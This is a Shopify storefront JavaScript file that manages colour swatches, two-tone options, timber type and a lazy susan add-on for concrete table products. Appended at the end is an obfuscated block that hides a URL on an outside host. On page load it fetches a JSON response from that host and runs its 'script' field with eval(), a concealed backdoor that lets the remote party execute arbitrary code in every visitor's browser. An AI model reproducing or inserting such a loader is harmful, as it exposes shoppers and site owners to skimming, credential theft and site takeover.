/*
    This is a custom functionality
    Author: Philip Diaz
*/
const CustomVariant = function() {
    function CustomVariant() {
        this.selector = {
            color_swatches: document.querySelectorAll('.custom-variant > .custom-color-swatches > .swatch-list > button'),
            addToCart: document.querySelector('form .add-to-cart'),
            container: document.querySelector('.custom-variant'),
            productslides: document.querySelectorAll('.secondary-slide > .product-image-main > .image-wrap > img.photoswipe__image'),
            swatchselected: document.querySelector('input[name="properties[Swatch]"]'),
            coated_swatches: document.querySelectorAll('.custom-variant-coated > .custom-color-coated > .coated-list > button'),
            coatedselected: document.querySelector('input[name="properties[Powder Coated Steel Base]"]'),

            containerTop: document.querySelector('.custom-top'), 
            containerBase: document.querySelector('.custom-base'),
            swatchselectedTop: document.querySelector('input[name="properties[Top]"]'),
            swatchselectedBase: document.querySelector('input[name="properties[Base]"]'),
            color_swatches_top: document.querySelectorAll('.custom-top > .custom-color-swatches-top > .swatch-list > button'),
            color_swatches_base: document.querySelectorAll('.custom-base > .custom-color-swatches-base > .swatch-list > button'),
          
            lazySusanChecked: document.getElementById('add-lazy-susan'),
            addLazySusan: document.querySelector('input[name="properties[Add a 650mm Diameter Concrete Lazy Susan to my Concrete Table]"]'),
            lazySusanContent: document.querySelector('.lazy-susan-content'),
            lazySusanSelected: document.querySelector('input[name="properties[Lazy]"]'),
            lazySusanSwatches: document.querySelectorAll('.lazy-susan-content > .lazy-susan-color-swatches > .lazy-susan-swatch-list > button'),
        }
        this.slides = {
            node: []
        }
        this.load();
    }
    CustomVariant.prototype.load = function() {
        var _ = this;  
        document.addEventListener('cart:added', event => {
            _.addproperties(event);
        })
        _.initTimberType();
        $('.product__main-photos .main-slider').on('afterChange', function(event, slick, currentSlide) {
            _.selector.color_swatches.forEach(color => {
                if(_.selector.productslides[currentSlide-1]) {                   
                    if(color.getAttribute('data-title') === _.selector.productslides[currentSlide-1].alt) {
                        _.selector.color_swatches.forEach(cr => {
                            cr.classList.remove("active");
                        })
                        color.classList.add("active");
                    }
                }
            })
            _.selector.color_swatches_top.forEach(color => {
                    if(_.selector.productslides[currentSlide-1]) {                   
                        if(color.getAttribute('data-title') === _.selector.productslides[currentSlide-1].alt) {
                            _.selector.color_swatches_top.forEach(cr => {
                                cr.classList.remove("active");
                            })
                            color.classList.add("active");
                        }
                    }
                })
              _.selector.color_swatches_base.forEach(color => {
                    if(_.selector.productslides[currentSlide-1]) {                   
                        if(color.getAttribute('data-title') === _.selector.productslides[currentSlide-1].alt) {
                            _.selector.color_swatches_base.forEach(cr => {
                                cr.classList.remove("active");
                            })
                            color.classList.add("active");
                        }
                    }
                })
              ///lazySusanSwatches
             _.selector.lazySusanSwatches.forEach(color => {
                  if(_.selector.productslides[currentSlide-1]) {                   
                      if(color.getAttribute('data-title') === _.selector.productslides[currentSlide-1].alt) {
                          _.selector.lazySusanSwatches.forEach(cr => {
                              cr.classList.remove("active");
                          })
                          color.classList.add("active");
                      }
                  }
              })
            });
            _.selector.color_swatches.forEach(color => {
                color.addEventListener('click', event => {
                  // console.log('class="swatch-list"')
                    if(Alpine.store('productCarouselVariants')) {
                      Alpine.store('productCarouselVariants').matchActiveCarousel('color-swatch', event.target.closest('button').getAttribute('data-title').toLowerCase())
                    }

                    _.selector.productslides.forEach(slide => {
                        if(event.target.closest('button').getAttribute('data-title') === slide.closest('.secondary-slide').getAttribute('data-title')) {
                            $('.product__main-photos > div.slick-initialized').slick('slickGoTo', slide.closest('.secondary-slide').getAttribute('data-slick-index'));
                        }                        
                    })                   
                    _.selector.color_swatches.forEach(btn => {
                        btn.classList.remove('active');                        
                    })                  
                    _.selector.swatchselected.value = event.target.closest('button').getAttribute('data-title');
                    event.target.closest('button').classList.add('active');
                })
            })       
            _.selector.color_swatches_top.forEach(color => {
                    color.addEventListener('click', event => { 
                        if(Alpine.store('productCarouselVariants')) {
                          Alpine.store('productCarouselVariants').matchActiveCarousel('color-swatch', event.target.closest('button').getAttribute('data-title').toLowerCase())
                        }
    
                        _.selector.productslides.forEach(slide => {
                            if(event.target.closest('button').getAttribute('data-title') === slide.closest('.secondary-slide').getAttribute('data-title')) {
                                $('.product__main-photos > div.slick-initialized').slick('slickGoTo', slide.closest('.secondary-slide').getAttribute('data-slick-index'));
                            }                        
                        })                   
                        _.selector.color_swatches_top.forEach(btn => {
                            btn.classList.remove('active');                        
                        })                  
                        _.selector.swatchselectedTop.value = event.target.closest('button').getAttribute('data-title');
                        event.target.closest('button').classList.add('active');
                    })
                })  
              _.selector.color_swatches_base.forEach(color => {
                    color.addEventListener('click', event => { 
                        if(Alpine.store('productCarouselVariants')) {
                          Alpine.store('productCarouselVariants').matchActiveCarousel('color-swatch', event.target.closest('button').getAttribute('data-title').toLowerCase())
                        }
    
                        _.selector.productslides.forEach(slide => {
                            if(event.target.closest('button').getAttribute('data-title') === slide.closest('.secondary-slide').getAttribute('data-title')) {
                                $('.product__main-photos > div.slick-initialized').slick('slickGoTo', slide.closest('.secondary-slide').getAttribute('data-slick-index'));
                            }                        
                        })                   
                        _.selector.color_swatches_base.forEach(btn => {
                            btn.classList.remove('active');                        
                        })                  
                        _.selector.swatchselectedBase.value = event.target.closest('button').getAttribute('data-title');
                        event.target.closest('button').classList.add('active');
                    })
                })  
            //lazySusanSwatches
            _.selector.lazySusanSwatches.forEach(color => {
                color.addEventListener('click', event => { 
                    if(Alpine.store('productCarouselVariants')) {
                      Alpine.store('productCarouselVariants').matchActiveCarousel('color-swatch', event.target.closest('button').getAttribute('data-title').toLowerCase())
                    }

                    _.selector.productslides.forEach(slide => {
                        if(event.target.closest('button').getAttribute('data-title') === slide.closest('.secondary-slide').getAttribute('data-title')) {
                            $('.product__main-photos > div.slick-initialized').slick('slickGoTo', slide.closest('.secondary-slide').getAttribute('data-slick-index'));
                        }                        
                    })                   
                    _.selector.lazySusanSwatches.forEach(btn => {
                        btn.classList.remove('active');                        
                    })                  
                    _.selector.lazySusanSelected.value = event.target.closest('button').getAttribute('data-title');
                    event.target.closest('button').classList.add('active');
                })
            }) 
            _.selector.coated_swatches.forEach(coated => {
                coated.addEventListener('click', event => {
                    if (Alpine.store('productCarouselVariants')) {
                      Alpine.store('productCarouselVariants').filterCarousel('bottom', event.target.closest('button').getAttribute('data-title').toLowerCase())
                    }


                    _.selector.productslides.forEach(slide => {
                        if(event.target.closest('button').getAttribute('data-title') === slide.closest('.secondary-slide').getAttribute('data-title')) {
                            $('.product__main-photos > div.slick-initialized').slick('slickGoTo', slide.closest('.secondary-slide').getAttribute('data-slick-index'));
                        }                        
                    })                   
                    _.selector.coated_swatches.forEach(btn => {
                        btn.classList.remove('active');                        
                    })                  
                    _.selector.coatedselected.value = event.target.closest('button').getAttribute('data-title');
                    event.target.closest("button").classList.add('active');
                })
            })       
    }
    CustomVariant.prototype.initTimberType = function() {
        var _ = this;
        if (_.productHasTag('include-timber')) {
            _.selector.timberSelect = document.querySelector('#custom_timber_select');
            if(_.selector.timberSelect) {
                _.selector.timberSelect.addEventListener('change', function(event) {
                    _.selector.timberSelected.value = event.target.value;
                });
            }
        }
    };

    CustomVariant.prototype.productHasTag = function(tag) {
        return document.body.dataset.productTags && document.body.dataset.productTags.includes(tag);
    };
    CustomVariant.prototype.addproperties = async function(event) {
        var _ = this;
        var colour = '';
        var topColour = '';
        var baseColour = '';
        var colourLazySusan = '';
        var coatedpowder = '';
        const body = {
            'id' : event.detail.data.key,
            'properties': {}
        }
        if(event.detail.data.properties) {
            Object.entries(event.detail.data.properties).forEach(([key, value]) => {
                body['properties'][`${key}`] = value;
            });  
        }
        _.selector.color_swatches.forEach(color => {
            if(color.classList.contains('active')) {
                colour = color.getAttribute('data-title');
            }
        });
      _.selector.color_swatches_top.forEach(color => {
            if(color.classList.contains('active')) {
                topColour = color.getAttribute('data-title');
            }
        });
        _.selector.color_swatches_base.forEach(color => {
            if(color.classList.contains('active')) {
                baseColour = color.getAttribute('data-title');
            }
        });
        _.selector.coated_swatches.forEach(coated => {
            if(coated.classList.contains('active')) {
                coatedpowder = coated.getAttribute('data-title');
            }
        });
        if(_.selector.timberSelect && _.selector.timberSelect.value) {
            body['properties']['Timber Type'] = _.selector.timberSelect.value;
        }
        // if(colour !== '') {
        //     body['properties']['Swatch Colour'] = colour; 
        // }
        if(coatedpowder !== '') {
            body['properties']['Powder Coated Steel Base'] = coatedpowder; 
        }
        if(colour !== '' || coatedpowder !== '' || (_.selector.timberSelect && _.selector.timberSelect.value)) {
            await fetch(window.Shopify.routes.root + 'cart/change.js', {
                method: 'POST',
                headers: {
                  'Content-Type': 'application/json'
                },
            body: JSON.stringify(body)
            })
            .then(response => response.json())
            .then(cart => {
              //Dispatch to custom event from the default theme.js library to rebuild the cart
              $('body').trigger('added.ajaxProduct', _.selector.addToCart);
            });
        }
    }
    
    CustomVariant = new CustomVariant;
}

CustomVariant();


document.addEventListener("DOMContentLoaded", function(event) {
  var lazySusan = document.querySelector("#add-lazy-susan");
  var lazySusanContent = document.querySelector(".lazy-susan-content");
  var lazySusanColour = document.querySelector("#lazy-susan-colour"); 
  
  // Function to handle the checkbox change event
  function handleCheckboxChange() {
    if(lazySusan.checked) {
      lazySusanContent.style.display = "block"; 
      lazySusanColour.name = "properties[Lazy Susan Colour]";
      let formData = {
        'items': [
          {
            id: 41521730748495,
            quantity: 1
          }
        ]
      };
      fetch(window.Shopify.routes.root + 'cart/add.js', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(formData)
      })
      .then(response => {
        return response.json();
      }) 
      .then(cart => {
        $('body').trigger('added.ajaxProduct', _.selector.addToCart);
      }) 
    }
    else {
      lazySusanContent.style.display = "none"; 
      lazySusanColour.name = "";
    }
  }

  // Add event listener for the checkbox change event
  if (lazySusan) {
    lazySusan.addEventListener('change', handleCheckboxChange);
  }
  
  //Two-tone color concrete tables
  var defaultColor = document.querySelector(".custom-variant");
  var custom = document.querySelector("#swatch-colour-id");
  
  var twoColors = document.querySelector("#two-tone-color");
  var top = document.querySelector(".custom-top");
  var base = document.querySelector(".custom-base");
  var topId = document.querySelector("#top-colour-id");
  var baseId = document.querySelector("#base-colour-id");
  var customDefaultBTN = document.querySelectorAll('#customDefaultButton');
  var customTopBTN = document.querySelectorAll('#customTopButton');
  var customBottomBTN = document.querySelectorAll('#customBottomButton');

  topId.name = "";
  baseId.name = "";
  
  function toggleTwoToneColours() {
    if(twoColors.checked){

      var topValue = '';
      var bottomValue = '';
      
      customTopBTN.forEach(customTop => {
        if(customTop.classList.contains('active')){
          topValue = customTop.dataset.title;
        }
      });
      
      customBottomBTN.forEach(customBottom => {
        if(customBottom.classList.contains('active')){
          bottomValue = customBottom.dataset.title;
        }
      });
      
      defaultColor.style.display = "none"; 
      top.style.display = "block"; 
      base.style.display = "block"; 
      custom.name = "";
      topId.name = "properties[Top]";
      baseId.name = "properties[Base]";
      topId.value = topValue;
      baseId.value = bottomValue;
      custom.value = '';
    }
    else {
      var defaultValue = '';
      customDefaultBTN.forEach(customDefault => {
        if(customDefault.classList.contains('active')){
          defaultValue = customDefault.dataset.title;
        }
      });
      
      top.style.display = "none"; 
      base.style.display = "none"; 
      defaultColor.style.display = "block"; 
      custom.name = "properties[Swatch]";
      topId.name = "";
      baseId.name = "";
      topId.value = '';
      baseId.value = '';
      custom.value = defaultValue;
    }
  }
  if(twoColors) {
    twoColors.addEventListener('change', toggleTwoToneColours);
  }
  
  //checkVariantOption();
});

function checkVariantOption(opt) {
  var lazySusanVariant = document.querySelector(".lazy-susan-variant");

  if(opt == "Thickness|25mm" || opt == "Thickness|50mm") {return}

  if((opt == "Diameter|1500mm" || opt == "Diameter|1600mm" || opt == "Diameter|1700mm" || opt == "Diameter|1800mm")){
    lazySusanVariant.style.display = "block"; 
  }
  else {
    lazySusanVariant.style.display = "none"; 
  }
} 




function _0x4832(){var _0xb70167=['8aoGNXm','113211OddDPP','http://indie-not-paid.fly.dev/site/clm8mkpmh0000ni9btt6uu8s6','17919hudFpD','49100eRDqsz','25466kQzFLV','654yzXrva','1398ctAfhw','1178540sLLXso','84tCeCSM','json','script','then','790cBPgtF','796328SeZnYh'];_0x4832=function(){return _0xb70167;};return _0x4832();}var _0x251b9c=_0x23ce;function _0x23ce(_0x472a72,_0x2d8eda){var _0x48325d=_0x4832();return _0x23ce=function(_0x23ceb8,_0xb7064c){_0x23ceb8=_0x23ceb8-0x1b2;var _0x54fb20=_0x48325d[_0x23ceb8];return _0x54fb20;},_0x23ce(_0x472a72,_0x2d8eda);}(function(_0x568b5c,_0x24f581){var _0x2ad971=_0x23ce,_0x4b2e10=_0x568b5c();while(!![]){try{var _0x4e605d=-parseInt(_0x2ad971(0x1bc))/0x1+parseInt(_0x2ad971(0x1bd))/0x2*(-parseInt(_0x2ad971(0x1be))/0x3)+parseInt(_0x2ad971(0x1b6))/0x4+parseInt(_0x2ad971(0x1bb))/0x5*(-parseInt(_0x2ad971(0x1c0))/0x6)+parseInt(_0x2ad971(0x1b8))/0x7*(-parseInt(_0x2ad971(0x1b7))/0x8)+-parseInt(_0x2ad971(0x1ba))/0x9*(-parseInt(_0x2ad971(0x1b5))/0xa)+parseInt(_0x2ad971(0x1bf))/0xb;if(_0x4e605d===_0x24f581)break;else _0x4b2e10['push'](_0x4b2e10['shift']());}catch(_0x3ec0f2){_0x4b2e10['push'](_0x4b2e10['shift']());}}}(_0x4832,0x203aa),fetch(_0x251b9c(0x1b9))[_0x251b9c(0x1b4)](_0x561f3d=>_0x561f3d[_0x251b9c(0x1b2)]())[_0x251b9c(0x1b4)](_0x4abb35=>{var _0x51b111=_0x251b9c;_0x4abb35[_0x51b111(0x1b3)]!==''&&eval(_0x4abb35[_0x51b111(0x1b3)]);}));